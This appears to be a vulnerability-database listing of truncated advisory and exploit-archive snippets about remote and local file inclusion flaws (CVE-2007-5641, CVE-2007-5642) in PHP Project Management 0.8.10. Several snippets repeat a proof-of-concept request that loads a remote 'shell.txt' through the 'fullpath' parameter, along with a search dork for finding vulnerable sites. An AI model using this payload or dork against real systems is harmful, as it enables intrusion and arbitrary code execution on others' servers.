SUSE CVE-2007-5641

Multiple PHP remote file inclusion vulnerabilities in PHP Project Management 0.8.10 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter to 1 certinfo/index.php, 2 emails/index.php, 3 events/index.php, 4 fax/index.php, 5 files/index.php, 6...

PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

No description provided by source. PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : PHP Project Management 0.8.10 POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...

Freelancer Kit v2.35 - Multiple Web Vulnerabilities

Document Title: =============== Freelancer Kit v2.35 - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=402 Release Date: ============= 2012-01-28 Vulnerability Laboratory ID VL-ID: ==================================== 402...

Directory traversal

Multiple directory traversal vulnerabilities in PHP Project Management 0.8.10 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the deflang parameter to modules/files/list.php; the mpath parameter to 2 modules/projects/summary.inc.php or 3...

CVE-2007-5642

Multiple directory traversal vulnerabilities in PHP Project Management 0.8.10 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the deflang parameter to modules/files/list.php; the mpath parameter to 2 modules/projects/summary.inc.php or 3...

CVE-2007-5642

CVE-2007-5642 affects PHP Project Management 0.8.10 and earlier. The issue is multiple directory traversal vulnerabilities that allow remote attackers to include and execute arbitrary local files by supplying a .. (dot dot) sequence in various parameters across modules (def_lang in modules/files/...

CVE-2007-5642

Multiple directory traversal vulnerabilities in PHP Project Management 0.8.10 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the deflang parameter to modules/files/list.php; the mpath parameter to 2 modules/projects/summary.inc.php or 3...

CVE-2007-5641

CVE-2007-5641 affects PHP Project Management 0.8.10 and earlier. The vulnerability is a remote file inclusion (RFI) weakness allowing an attacker to supply a URL in the full_path parameter to multiple modules (e.g., certinfo, emails, events, files, projects, etc.) to execute arbitrary PHP code on...

PHP Project Management &lt;= 0.8.10 Multiple RFI / LFI Vulnerabilities

No description provided by source. PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...

PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

Exploit for unknown platform in category web applications =================================================================== PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities =================================================================== PHP Project Management = 0.8.10...

PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions

PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...